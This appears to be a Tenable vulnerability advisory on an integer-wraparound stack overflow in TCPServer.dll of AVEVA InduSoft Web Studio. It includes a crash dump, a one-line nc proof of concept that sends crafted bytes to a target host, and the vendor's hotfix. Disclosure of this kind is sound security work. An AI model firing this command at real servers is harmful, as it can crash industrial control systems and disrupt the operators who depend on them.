Synopsis
Tenable found a stack buffer overflow vulnerability in TCPServer.dll while developing a Nessus plugin for CVE-2018-8840. To understand the vulnerability a description of the WSTR structure in TCPServer.dll is useful. The WSTR class is used to store wide-character strings:
Class WSTR
{
vftable;
unsigned short lbuf[0x40]; // local storage for the string data
void *pData; // ptr to string data; can point to @lbuf
int32 DataLen; // length allocated for @pData
...
};
Strings shorter than 0x40 bytes are stored in the lbuff array. Otherwise, heap memory is allocated and pData and DataLen are updated accordingly.
When processing command 81, TCPServer.dll tries to read a string into a WSTR object. To determine if the string should be stored in lbuf or in a heap allocated buffer, TCPServer.dll will first read in the string length. The user provided length is incremented by one to account for a null terminator and compared against 0x40. If the length + 1 is less than 0x40 then the string will be stored in lbuf. A remote unauthenticated attacker can abuse this by providing a length of 0xffffffff. When one is added the length rolls over to zero which causes TCPServer.dll to try to store the string in lbuf. The server will then attempt to copy 0xfffffff bytes into lbuf resulting in the following stack buffer overflow:
STATUS_STACK_BUFFER_OVERRUN encountered (9e8.b28): Break instruction exception - code 80000003 (first chance) eax=00000000 ebx=5d15b708 ecx=766ce4b4 edx=0e76efb9 esi=00000000 edi=00ec2870 eip=766ce331 esp=0e76f200 ebp=0e76f27c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 kernel32!UnhandledExceptionFilter+0x5f: 766ce331 cc int 3 0:020> kb # ChildEBP RetAddr Args to Child 00 0e76f27c 694c00f1 5d15b708 0e76f298 5d133403 kernel32!UnhandledExceptionFilter+0x5f *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\InduSoft Web Studio v8.1\Bin\TCPSERVER.DLL - 01 0e76f288 5d133403 5d15b708 00000001 0e76f5c8 MSVCR110!__crtUnhandledException+0x14 WARNING: Stack unwind information not available. Following frames may be wrong. 02 0e76f298 5d13351a 5d15b708 00000010 00000044 TCPSERVER!_StudioSetLanguage__+0x1653 03 0e76f5c8 5d0bdbff 049ecae8 049ecb18 049ecb18 TCPSERVER!_StudioSetLanguage__+0x176a 04 0e76f7ec 00410041 00410041 00410041 00410041 TCPSERVER+0x3dbff 05 0e76f7f0 00410041 00410041 00410041 00410041 0x410041 06 0e76f7f4 00410041 00410041 00410041 00410041 0x410041 07 0e76f7f8 00410041 00410041 00410041 00410041 0x410041 [...]
The following commands will recreate the issue:
cat < (echo -ne '\x02\x31\x10\x31\x10\x38\x10\x32\x10\x32\x03\x02\x51\xff\xff\xff\xff\xff\xff\xff'`python -c "print 'A'*1000"`'\x03') - | nc <target_host> 1234
Solution
AVEVA has released updates InduSoft Web Studio Hotfix 81.1.00.08 and InTouch Machine Edition Hotfix 81.1.00.08 to address this vulnerability.Additional References
https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/SecurityBulletin_LFSec128(002).pdf?t=1531912618199https://ics-cert.us-cert.gov/advisories/ICSA-18-200-01
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]
Contact our sales team